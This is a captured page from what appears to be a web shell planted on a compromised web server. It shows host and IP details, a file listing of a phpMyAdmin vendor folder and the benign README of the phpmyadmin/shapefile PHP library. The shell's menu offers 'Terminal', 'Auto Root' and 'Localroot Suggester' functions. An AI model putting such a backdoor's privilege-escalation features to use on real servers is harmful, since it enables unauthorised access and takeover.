Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.117.106.206
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
myadmin /
vendor /
phpmyadmin /
shapefile /
Delete
Unzip
Name
Size
Permission
Date
Action
src
[ DIR ]
drwxr-xr-x
2020-10-15 12:07
CHANGELOG.md
1.3
KB
-rw-r--r--
2021-02-05 18:31
CONTRIBUTING.md
877
B
-rw-r--r--
2021-02-05 18:31
LICENSE
17.62
KB
-rw-r--r--
2021-02-05 18:31
README.md
1.92
KB
-rw-r--r--
2021-02-05 18:31
codecov.yml
54
B
-rw-r--r--
2021-02-05 18:31
composer.json
938
B
-rw-r--r--
2021-02-05 18:31
phpunit.xml
808
B
-rw-r--r--
2021-02-05 18:31
Save
Rename
# shapefile ShapeFile library for PHP [](https://travis-ci.org/phpmyadmin/shapefile) [](https://codecov.io/github/phpmyadmin/shapefile?branch=master) [](https://scrutinizer-ci.com/g/phpmyadmin/shapefile/?branch=master) [](https://packagist.org/packages/phpmyadmin/shapefile) ## Features Currently the 2D and 3D variants except MultiPatch of the ShapeFile format as defined in https://www.esri.com/library/whitepapers/pdfs/shapefile.pdf. The library currently supports reading and editing of ShapeFiles and the Associated information (DBF file). There are a lot of things that can be improved in the code, if you are interested in developing, helping with the documentation, making translations or offering new ideas please contact us. ## Installation Please use [Composer][1] to install: ``` composer require phpmyadmin/shapefile ``` To be able to read and write the associated DBF file, you need ``dbase`` extension: ``` pecl install dbase echo "extension=dbase.so" > /etc/php5/conf.d/dbase.ini ``` ## Documentation The API documentation is available at <https://develdocs.phpmyadmin.net/shapefile/>. ## Usage To read shape file: ```php $shp = new \PhpMyAdmin\ShapeFile\ShapeFile(0); $shp->loadFromFile('path/file.*'); ``` ## History This library is based on BytesFall ShapeFiles library written by Ovidio (ovidio AT users.sourceforge.net). The library has been embedded in phpMyAdmin for years and slowly developed there. At one point people started to use our version rather than the original library and that was the point we decided to make it separate package. [1]:https://getcomposer.org/